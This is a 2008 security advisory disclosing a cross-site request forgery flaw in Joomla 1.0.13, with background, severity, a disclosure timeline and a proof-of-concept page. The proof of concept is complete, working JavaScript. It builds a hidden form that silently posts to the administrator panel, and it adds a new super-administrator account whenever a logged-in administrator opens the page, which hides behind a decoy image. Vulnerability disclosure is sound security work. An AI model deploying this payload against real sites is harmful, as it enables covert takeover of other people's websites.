Author: Jose Carlos Nieto.

Date: Jan 08, 2008

Severity: Mild

There exists a Cross Site Request Forgery security hole in Joomla 1.0.13.


Background
==========

*Joomla!* is a free <http://en.wikipedia.org/wiki/Free_software>, open source <http://en.wikipedia.org/wiki/Open_source_software> content management system <http://en.wikipedia.org/wiki/Content_management_system> for publishing content
on the world wide web <http://en.wikipedia.org/wiki/World_wide_web> and intranets <http://en.wikipedia.org/wiki/Intranet>.
Joomla! is licensed under the GPL <http://en.wikipedia.org/wiki/GNU_General_Public_License>, and is the result of a fork <http://en.wikipedia.org/wiki/Fork_%28software_development%29> of Mambo <http://en.wikipedia.org/wiki/Mambo_%28CMS%29>.


Severity
========
Mild. It requires an administrator to be logged in and to be tricked into a specially
crafted webpage.


Summary
=======
Joomla! has no CSRF protection. A malicious user can trick an administrator into viewing
a specially crafted webpage containing an exploit, this exploit can execute (without permission)
any command the administrator would normally execute, such as publish a content or even add a new
administrator.


Solution
========
This problem has no solution at this time.


Disclosure timeline
===================
Oct 18 2007 - Vulnerability found.
Oct 18 2007 - Vulnerability reported to vendor.
Oct 18 2007 - Answer from vendor.
Jan 08 2008 - Advisory released.


Proof of Concept
================

If a logged in administrator visits this page a new administrator will be added to the victim's
Joomla powered website.

---- exploit code ----

<script type="text/javascript">

window.onload = function() {

    var url = "http://joomlasite.com/joomla/administrator/index2.php";


    var gid = 25;

    var user = 'custom_username';

    var pass = 'custom_password';

    var email = 'joe_cool@example.com';

    var param = {

        name: user,

        username: user,

        email: email,

        password: pass,

        password2: pass,

        gid: gid,

        block: 0,

        option: 'com_users',

        task: 'save',

        sendEmail: 1

    };


    var form = document.createElement('form');

    form.action = url;

    form.method = 'post';

    form.target = 'hidden';

    form.style.display = 'none';


    for (var i in param) {

        try {

            // ie

            var input = document.createElement('<input name="'+i+'">');

        } catch(e) {

            // other browsers

            var input = document.createElement('input');

            input.name = i;

        }

        input.setAttribute('value',  param[i]);

        form.appendChild(input);

    }

    document.body.appendChild(form);


    form.submit();

}

</script>


<iframe name="hidden" style="display: none"></iframe>


<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">

---- exploit code ----